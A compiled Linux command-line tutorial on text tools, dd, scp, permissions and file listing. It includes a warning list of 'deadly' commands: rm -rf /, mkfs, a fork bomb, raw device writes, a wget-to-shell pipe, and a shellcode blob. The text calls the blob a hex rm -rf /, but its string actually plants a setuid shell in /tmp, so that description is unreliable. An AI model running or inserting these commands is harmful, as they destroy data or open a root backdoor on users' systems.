dd if=/dev/urandom of=/home/sam/myrandom bs=100 count=1

To convert a file to uppercase (write the result to a different output file; reusing the same name would truncate the input before it is read):

dd if=filename of=filename_uppercase conv=ucase

To search the system memory:

dd if=/dev/mem | hexdump -C | grep 'some-string-of-words-in-the-file-you-forgot-to-save-before-you-hit-the-close-button'

Image a partition to another machine:

On source machine:

dd if=/dev/hda bs=16065b | netcat targethost-IP 1234

On target machine:

netcat -l -p 1234 | dd of=/dev/hdc bs=16065b

Everybody has mentioned the first obvious fix: raise your blocksize from the default 512 bytes. The second fix addresses the problem that with a single dd, you are either reading or writing. If you pipe the first dd into a second one, it'll let you run at the max speed of the slowest device.
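
A minimal sketch of that two-dd pipeline with a larger block size (the device names are placeholders):

dd if=/dev/sda bs=1M | dd of=/dev/sdb bs=1M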

Ubuntu Text Editors and Other commands for Manipulating Text

Nano Text Editor

$ nano memo.txt Open memo.txt for editing
$ nano -B memo.txt When saving, back up previous to ~.filename
$ nano -m memo.txt Turn on mouse to move cursor (if supported)
$ nano +83 memo.txt Begin editing on line 83

The -m command-line option turns on support for a mouse. You can use the mouse to select a position in the text, and the cursor moves to that position. After the first click, though, nano uses the mouse to mark a block of text, which may not be what you are expecting.

Listing, Sorting, and Changing Text

Instead of just editing a single text file, you can use a variety of Linux commands to display, search, and manipulate the contents of one or more text files at a time. Listing Text Files The most basic method to display the contents of a text file is with the cat command. The cat command concatenates (in other words, outputs as a string of characters) the contents of a text file to your display (by default). You can then use different shell metacharacters to direct the contents of that file in different ways. For example:

$ cat myfile.txt Send entire file to the screen
$ cat myfile.txt > copy.txt Direct file contents to another file
$ cat myfile.txt >> myotherfile.txt Append file contents to another file
$ cat -s myfile.txt Display consecutive blank lines as one
$ cat -n myfile.txt Show line numbers with output
$ cat -b myfile.txt Show line numbers only on non-blank lines

However, if your block of text is more than a few lines long, using cat by itself becomes impractical. That's when you need better tools to look at the beginning or the end, or page through the entire text.

To view the top of a file, use head:

$ head myfile.txt
$ cat myfile.txt | head

Both of these command lines use the head command to output the top 10 lines of the file. You can specify the line count as a parameter to display any number of lines from the beginning of a file. For example:

$ head -n 50 myfile.txt Show the first 50 lines of a file
$ ps auwx | head -n 15 Show the first 15 lines of ps output

This can also be done using this obsolete (but shorter) syntax:

$ head -50 myfile.txt
$ ps auwx | head -15

You can use the tail command in a similar way to view the end of a file:

$ tail -n 15 myfile.txt Display the last 15 lines in a file
$ tail -15 myfile.txt Display the last 15 lines in a file
$ ps auwx | tail -n 15 Display the last 15 lines of ps output

The tail command can also be used to continuously watch the end of a file as the file is written to by another program. This is very useful for reading live log files when troubleshooting apache, sendmail, or many other system services:

# tail -f /var/log/messages Watch system messages live
# tail -f /var/log/maillog Watch mail server messages live
# tail -f /var/log/httpd/access_log Watch web server messages live

Paging Through Text

When you have a large chunk of text and need to get to more than just its beginning or end, you need a tool to page through the text. The original Unix system pager was the more command:

$ ps auwx | more Page through the output of ps (press spacebar)
$ more myfile.txt Page through the contents of a file

However, more has some limitations. For example, in the line with ps above, more could not scroll up. The less command was created as a more powerful and user-friendly more. The common saying when less was introduced was: "What is less? less is more!" We recommend you no longer use more, and use less instead.

	Note 	

The less command has another benefit worth noting. Unlike text editors such as vi, it does not read the entire file when it starts. This results in faster start-up times when viewing large files. The less command can be used with the same syntax as more in the examples above:

$ ps auwx | less Page through the output of ps
$ cat myfile.txt | less Page through the contents of a file
$ less myfile.txt Page through a text file

The less command enables you to navigate using the up and down arrow keys, PageUp, PageDown, and the spacebar. If you are using less on a file (not standard input), press v to open the current file in an editor. Which editor gets launched is determined by environment variables defined for your account. The editor is taken from the environment variable VISUAL, if defined, or EDITOR if VISUAL is not defined. If neither is defined, less invokes the JOE editor on Ubuntu.

	Note 	

Other versions of Linux invoke vi as the default editor in this case. Press Ctrl+c to interrupt that mode. As in vi, while viewing a file with less, you can search for a string by pressing / (forward slash) followed by the string and Enter. To search for further occurrences, press / and Enter repeatedly. To scroll forward and back while using less, use the F and B keys, respectively. For example, 10f scrolls forward 10 lines and 15b scrolls back 15 lines. Type d to scroll down half a screen and u to scroll up half a screen.

Searching for Text with grep

The grep command comes in handy when you need to perform more advanced string searches in a file. In fact, the phrase to grep has actually entered the computer jargon as a verb, just as to Google has entered the popular language. Here are examples of the grep command:

$ grep francois myfile.txt Show lines containing francois
# grep 404 /var/log/httpd/access_log Show lines containing 404
$ ps auwx | grep init Show init lines from ps output
$ ps auwx | grep "\[*\]" Show bracketed commands
$ dmesg | grep "[ ]ata\|^ata" Show ata kernel device information

These command lines have some particular uses, beyond being examples of the grep command. By searching access_log for 404 you can see requests to your web server for pages that were not found (these could be someone fishing to exploit your system, or a web page you moved or forgot to create). Displaying bracketed commands that are output from the ps command is a way to see commands for which ps cannot display options. The last command checks the kernel buffer ring for any ATA device information, such as hard disks and CD-ROM drives.

The grep command can also recursively search a few or a whole lot of files at the same time. The following command recursively searches files in the /etc/httpd/conf and /etc/httpd/conf.d directories for the string VirtualHost:

$ grep -R VirtualHost /etc/httpd/conf*

Note that your system may not have any files with names starting with conf in the /etc/httpd directory, depending on what you have installed on your system. You can apply this technique to other files as well.

Add line numbers (-n) to your grep command to find the exact lines where the search terms occur:

$ grep -Rn VirtualHost /etc/httpd/conf*

To colorize the searched term in the search results, add the --color option:

$ grep --color -Rn VirtualHost /etc/httpd/conf*

By default, in a multifile search, the file name is displayed for each search result. Use the -h option to suppress the file names. This example searches all the auth.log files (including rotated copies) for the string sshd without printing which file each match came from:

$ grep -h sshd /var/log/auth.log*

If you want to ignore case when you search messages, use the -i option:

$ grep -i selinux /var/log/messages Search file for selinux (any case)

To display only the name of the file that includes the search term, add the -l option:

$ grep -Rl VirtualHost /etc/httpd/conf*

To display all lines that do not match the string, add the -v option:

$ grep -v "200 "/var/log/httpd/access_log* Show lines without "200 "
	Note 	

When piping the output of ps into grep, here's a trick to prevent the grep process from appearing in the grep results:

# ps auwx | grep "[i]nit"
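
If pgrep is available (it is part of the procps package that Ubuntu installs by default), you can skip the pipeline entirely; this is a sketch and the exact output columns depend on your pgrep version:

$ pgrep -a init      List matching processes along with their command lines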

Replacing Text with Sed

Finding text within a file is sometimes the first step towards replacing text. Editing streams of text is done using the sed command. The sed command is actually a full-blown scripting language. For the examples in this chapter, we cover basic text replacement with the sed command. If you are familiar with text replacement commands in vi, sed has some similarities. In the following example, you would replace only the first occurrence per line of francois with chris. Here, sed takes its input from a pipe, while sending its output to stdout (your screen):

$ cat myfile.txt | sed s/francois/chris/

Adding a g to the end of the substitution line, as in the following command, causes every occurrence of francois to be changed to chris. Also, in the following example, input is directed from the file myfile.txt and output is directed to mynewfile.txt:

$ sed s/francois/chris/g < myfile.txt > mynewfile.txt
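
If you want sed to change a file in place instead of writing to stdout, GNU sed (the version shipped with Ubuntu) supports the -i option. A minimal sketch that keeps a backup copy in case the substitution does not do what you expect:

$ sed -i.bak s/francois/chris/g myfile.txt    Edit myfile.txt in place, saving the original as myfile.txt.bak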

The next example replaces occurrences of the text /home/bob with /home2/bob in output read from the /etc/passwd file. (Note that this command does not change that file, but outputs the changed text.) This is useful when user accounts are migrated to a new directory (presumably on a new disk) named, with much deliberation, home2. Here, we have to use quotes and backslashes to escape the forward slashes so they are not interpreted as delimiters:

$ sed 's/\/home\/bob/\/home2\/bob/g' < /etc/passwd

Although the forward slash is the sed command's default delimiter, you can change the delimiter to any other character of your choice. Changing the delimiter can make your life easier when the string contains slashes. For example, the previous command line that contains a path could be replaced with either of the following commands:

$ sed 's-/home/bob-/home2/bob-g' < /etc/passwd
$ sed 'sD/home/bobD/home2/bobDg' < /etc/passwd

In the first line shown, a dash (-) is used as the delimiter. In the second case, the letter D is the delimiter.

The sed command can run multiple substitutions at once, by preceding each one with -e. Here, in the text streaming from myfile.txt, all occurrences of francois are changed to FRANCOIS and occurrences of chris are changed to CHRIS:

$ sed -e s/francois/FRANCOIS/g -e s/chris/CHRIS/g < myfile.txt
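
When the list of substitutions grows, it can be tidier to keep them in a file and point sed at it with -f. A sketch, assuming a file named mysubs.sed that you create yourself with one substitution per line:

$ cat mysubs.sed
s/francois/FRANCOIS/g
s/chris/CHRIS/g
$ sed -f mysubs.sed < myfile.txt    Apply every substitution listed in mysubs.sed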

You can use sed to add newline characters to a stream of text. Where Enter appears, press the Enter key. The > on the second line is generated by bash, not typed in.

$ echo aaabccc | sed 's/b/\Enter
> /'
aaa
ccc

The trick just shown does not work on the left side of the sed substitution command. When you need to substitute newline characters, it's easier to use the tr command.

Translating or Removing Characters with tr

The tr command is an easy way to do simple character translations on the fly. In the following example, new lines are replaced with spaces, so all the files listed from the current directory are output on one line:

$ ls | tr '\n' ' ' Replace newline characters with spaces

The tr command can be used to replace one character with another, but does not work with strings like sed does. The following command replaces all instances of the lowercase letter f with a capital F.

$ tr f F < myfile.txt Replace every f in the file with F

You can also use the tr command to simply delete characters. Here are two examples:

$ ls | tr -d '\n' Delete new lines (resulting in one line)
$ tr -d f < myfile.txt Delete every letter f from the file

The tr command can do some nifty tricks when you specify ranges of characters to work on. Here's an example of translating lowercase letters to uppercase:

$ echo chris | tr a-z A-Z Translate chris into CHRIS
CHRIS

The same result can be obtained with the following syntax:

$ echo chris | tr '[:lower:]' '[:upper:]' Translate chris into CHRIS
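
The tr command can also squeeze runs of a repeated character down to a single occurrence with the -s option, which is useful for cleaning up ragged whitespace:

$ echo "too    many   spaces" | tr -s ' '    Squeeze repeated spaces into one
too many spaces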

Checking Differences Between Two Files with diff

When you have two versions of a file, it can be useful to know the differences between them. For example, when upgrading a software package, you may save your old configuration file under a new file name, such as config.old or config.bak, so you preserve your configuration. When that occurs, you can use the diff command to discover which lines differ between your configuration and the new configuration, in order to merge the two. For example:

$ diff config config.old

You can change the output of diff to what is known as unified format. Unified format can be easier to read by human beings. It adds three lines of context before and after each block of changed lines that it reports, and then uses + and - to show the difference between the files. The following set of commands creates a file (f1.txt) containing a sequence of numbers (1-7), creates a file (f2.txt) with one of those numbers changed (using sed), and compares the two files using the diff command:

$ seq 1 7 > f1.txt Send a sequence of numbers to f1.txt
$ cat f1.txt Display contents of f1.txt

1
2
3
4
5
6
7

$ sed s/4/FOUR/ < f1.txt > f2.txt Change 4 to FOUR and send to f2.txt
$ diff f1.txt f2.txt

4c4                          Shows that line 4 was changed in the file
< 4
---
> FOUR

$ diff -u f1.txt f2.txt      Display unified output of diff

--- f1.txt    2007-09-07 18:26:06.000000000 -0500
+++ f2.txt    2007-09-07 18:26:39.000000000 -0500
@@ -1,7 +1,7 @@
 1
 2
 3
-4
+FOUR
 5
 6
 7

The diff -u output just displayed adds information such as modification dates and times to the regular diff output. The sdiff command can be used to give you yet another view. The sdiff command can merge the output of two files interactively, as shown in the following output:

$ sdiff f1.txt f2.txt

1                       1
2                       2
3                       3
4                     | FOUR
5                       5
6                       6
7                       7

Another variation on the diff theme is vimdiff, which opens the two files side by side in Vim and outlines the differences in color. Similarly, gvimdiff opens the two files in gVim.

	Note 	

You need to install the vim-gnome package to run the gvim or gvimdiff programs.

The output of diff -u can be fed into the patch command. The patch command takes an old file and a diff file as input and outputs a patched file. Following on from the example above, we use the diff command between the two files to generate a patch and then apply the patch to the first file:

$ diff -u f1.txt f2.txt > patchfile.txt
$ patch f1.txt < patchfile.txt

patching file f1.txt

$ cat f1.txt
1
2
3
FOUR
5
6
7

That is how many OSS developers (including kernel developers) distribute their code patches. The patch and diff commands can also be run on entire directory trees. However, that usage is outside the scope of this book.
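
If a patch turns out to be wrong, the same patch file can usually be backed out with the -R (reverse) option of patch. Continuing the example above, this sketch restores f1.txt to its original contents:

$ patch -R f1.txt < patchfile.txt    Reverse the patch that was just applied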

Using awk and cut to Process Columns

Another powerful text-processing tool is the awk command. The awk command is a full-blown programming language. Although there is much more you can do with the awk command, the following examples show you a few tricks related to extracting columns of text:

$ ps auwx | awk '{print $1,$11}' Show columns 1, 11 of ps
$ ps auwx | awk '/francois/ {print $11}' Show francois' processes
$ ps auwx | grep francois | awk '{print $11}' Same as above

The first example displays the contents of the first column (user name) and eleventh column (command name) from currently running processes output from the ps command (ps auwx). The next two commands produce the same output, with one using the awk command and the other using the grep command to find all processes owned by the user named francois. In each case, when processes owned by francois are found, column 11 (command name) is displayed for each of those processes.
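
Although these examples only print columns, awk can also compute with them. The following sketch totals column 6 (the resident set size, reported in kilobytes by most ps implementations) across all processes; treat it as an illustration rather than a precise accounting of memory use:

$ ps auwx | awk '{sum += $6} END {print sum " KB resident"}'    Sum the RSS column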

By default, the awk command assumes the delimiter between columns is spaces. You can specify a different delimiter with the -F option as follows:

$ awk -F: '{print $1,$5}' /etc/passwd Use colon delimiter to print cols

You can get similar results with the cut command. As with the previous awk example, we specify a colon (:) as the column delimiter to process information from the /etc/passwd file:

$ cut -d: -f1,5 /etc/passwd Use colon delimiter to print cols

The cut command can also be used with ranges of fields. The following command prints columns 1 through 5 of the /etc/passwd file:

$ cut -d: -f1-5 /etc/passwd Show columns 1 through 5

Instead of using a dash (-) to indicate a range of numbers, you can use it to print all columns from a particular column number and above. The following command displays all columns from column 5 and above from the /etc/passwd file:

$ cut -d: -f5- /etc/passwd Show columns 5 and later

We prefer to use the awk command when columns are separated by a varying number of spaces, such as the output of the ps command. And we prefer the cut command when dealing with files delimited by commas (,) or colons (:), such as the /etc/passwd file.
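
The reason for that preference is that cut treats every occurrence of the delimiter as significant, so the runs of spaces in ps output produce a string of empty fields. The comparison below is a sketch; squeezing the spaces with tr first makes cut behave much more like the awk example above:

$ ps auwx | cut -d' ' -f1,11                 Unreliable: repeated spaces become empty fields
$ ps auwx | tr -s ' ' | cut -d' ' -f1,11     Squeeze spaces first, then cut columns 1 and 11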

Converting Text Files to Different Formats

Text files in the Unix world use a different end-of-line character (\n) than those used in the DOS/Windows world (\r\n). You can view these special characters in a text file with the od command:

$ od -c -t x1 myfile.txt

For text files to appear properly when copied from one environment to the other, it is necessary to convert them. Here are some examples:

$ unix2dos < myunixfile.txt > mydosfile.txt
$ cat mydosfile.txt | dos2unix > myunixfile.txt

The unix2dos example just shown above converts a Linux or Unix plain text file (myunixfile.txt) to a DOS or Windows text file (mydosfile.txt). The dos2unix example does the opposite by converting a DOS/Windows file to a Linux/Unix file. These commands require you to install the tofrodos package.
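
If the tofrodos package is not installed, tools that are already on the system can do much the same job; this is a sketch, and the second form assumes GNU sed:

$ tr -d '\r' < mydosfile.txt > myunixfile.txt     Strip carriage returns (DOS to Unix)
$ sed 's/$/\r/' myunixfile.txt > mydosfile.txt    Append carriage returns (Unix to DOS)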

7 Deadly Linux Commands

If you are new to Linux, chances are you will run into someone in a forum or chat room who tries to trick you into running commands that will harm your files or even your entire operating system. To avoid that scenario, here is a list of deadly Linux commands that you should never run.

  • This command will recursively and forcefully delete all the files inside the root directory.
rm -rf /


  • This is the hex version of [rm -rf /] that can deceive even rather experienced Linux users.
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
  • This will reformat the device named after the mkfs command, wiping out all the files on it.
mkfs.ext3 /dev/sda
  • Known as a fork bomb, this command tells your system to spawn processes endlessly until it freezes, which often leads to data corruption.
:(){:|:&};:
  • This command writes raw data directly to a block device, which will usually clobber the filesystem and result in total loss of data.
any_command > /dev/sda
  • Never download a script from an untrusted source and pipe it straight into a shell; you could be executing malicious code.
wget http://some_untrusted_source -O- | sh


  • This command tries to move all the files inside your home directory to /dev/null; anything that ends up there is gone for good.
mv /home/yourhomedirectory/* /dev/null

Copy Files Using SCP

Run these commands from a terminal on the local machine.

copy a file from a remote machine to my machine:

scp user@192.168.1.100:/home/remote_user/Desktop/file.txt /home/me/Desktop/file.txt 

copy from my machine to a remote machine:

scp /home/me/Desktop/file.txt user@192.168.1.100:/home/remote_user/Desktop/file.txt 

copy all file*.txt from a remote machine to my machine (file01.txt, file02.txt, etc.); note the quotation marks, which keep the local shell from expanding the wildcard:

scp "user@192.168.1.100:/home/remote_user/Desktop/file*.txt" /home/me/Desktop/file.txt 

copy a directory from a remote machine to my machine:

scp -r user@192.168.1.100:/home/remote_user/Desktop/files /home/me/Desktop/

Local to remote

scp -r directory root@domain.com:/var/www/

Copy all files and directories from the directory you are currently in (after cd'ing into it)

scp -r * root@domain.com:/var/www/
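
If the remote sshd listens on a non-standard port, note that scp takes the port as -P (capital P), unlike ssh's lowercase -p. A sketch using a made-up port number:

scp -P 2222 file.txt user@192.168.1.100:/home/remote_user/Desktop/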

See 'man scp' or 'man sftp' for more.

SCP with Key

scp -i ~/.ssh/id_rsa FILENAME USER@SERVER:/home/USER/FILENAME
(the -i option takes the private key, not the .pub file)

My Frequently used Linux Commands

Command to show all users:

cat /etc/passwd 
lastlog
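
Since /etc/passwd is colon-delimited, the cut technique shown earlier works here as well; a quick sketch that lists only the account names:

cut -d: -f1 /etc/passwd | sort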

List all installed Apache Modules

apache2ctl -M

Update server

sudo apt-get update
sudo apt-get dist-upgrade

Move files and folders

mv *.* destination/   moves only items whose names contain a dot (typically files with extensions)
mv * destination/     moves all non-hidden files and folders

Updating Ubuntu

sudo aptitude update
sudo aptitude safe-upgrade

ssh using a different port

ssh -p 113 root@whatever.com

Change Permissions

chmod -R 777 folder

use 755 instead of 777 where possible

Read More ... Setting File and Directory Permissions

Restart the network in Fedora

/etc/init.d/network restart

Change the owner and group

chown -R bacchas2:psacln folder

Create New Directories

$ mkdir /tmp/new          Create "new" directory in /tmp
$ mkdir -p /tmp/a/b/c/new Create parent directories as needed for "new"
$ mkdir -m 700 /tmp/new2  Create new2 with drwx------ permissions

The first mkdir command simply adds the new directory to the existing /tmp directory. The second example creates directories as needed (subdirectories a, b, and c) to create the resulting new directory. The last command adds the -m option to set directory permissions as well.
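
To confirm what -m actually set, list the directory itself (not its contents) with ls -ld; a sketch, assuming the directories from the examples above exist:

$ ls -ld /tmp/new2    Long listing of the directory entry itself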

Removing Files and Directories with rm

rm [-f] [-i] [-R] [-r] [filenames | directory]
  • -f Remove all files (whether write-protected or not) in a directory without prompting the user. In a write-protected directory, however, files are never removed (whatever their permissions are), but no messages are displayed. If the removal of a write-protected directory is attempted, this option will not suppress an error message.
  • -i Interactive. With this option, rm prompts for confirmation before removing any files. It overrides the -f option and remains in effect even if the standard input is not a terminal.
  • -R Same as -r option.
  • -r Recursively remove directories and subdirectories in the argument list. The directory will be emptied of files and removed. The user is normally prompted for removal of any write-protected files which the directory contains. The write-protected files are removed without prompting, however, if the -f option is used, or if the standard input is not a terminal and the -i option is not used. Symbolic links that are encountered with this option will not be traversed. If the removal of a non-empty, write-protected directory is attempted, the utility will always fail (even if the -f option is used), resulting in an error message.
  • filenames The path of a file (or files) to be removed.

Examples

rm myfile.txt

Remove the file myfile.txt without prompting the user.

rm -r directory

Remove a directory, even if it contains files.
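
One removal case that trips people up is a file whose name begins with a dash, because rm mistakes the name for an option. Use -- to mark the end of options, or give an explicit path; a sketch with a hypothetical file name:

rm -- -oddfile.txt    Remove a file literally named "-oddfile.txt"
rm ./-oddfile.txt     Same result, using an explicit path instead of --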

Listing Files

Although you are probably quite familiar with the ls command, you may not be familiar with many of the useful options for ls that can help you find out a lot about the files on your system. Here are some examples of using ls to display long lists (-l) of files and directories:

  • $ ls -l Files and directories in current directory
  • $ ls -la Includes files/directories beginning with dot (.)
  • $ ls -lt Orders files by time recently changed
  • $ ls -lu Orders files by time recently accessed
  • $ ls -lS Orders files by size
  • $ ls -li Lists the inode associated with each file
  • $ ls -ln List numeric user/group IDs, instead of names
  • $ ls -lh List file sizes in human-readable form (K, M, etc.)
  • $ ls -lR List files recursively, from current directory and subdirectories

When you list files, there are also ways to have different types of files appear differently in the listing:

$ ls -F                Add a character to indicate file type

myfile-symlink@ config/ memo.txt pipefile| script.sh* xpid.socket=

$ ls --color=always    Show file types as different colors
$ ls -C                Show files listing in columns

In the -F example, the output shows several different file types. The myfile-symlink@ indicates a symbolic link, config/ is a regular directory, memo.txt is a regular file (no extra characters), pipefile| is a named pipe (created with mkfifo), script.sh* is an executable file, and xpid.socket= is a socket. The next two examples display different file types in different colors and list the output in columns, respectively.
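
The long-listing options shown above can be combined; two combinations we reach for often (a sketch):

$ ls -ltr     Long listing, oldest first, so the most recently changed files end up at the bottom
$ ls -lhS     Long listing, largest files first, with human-readable sizes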

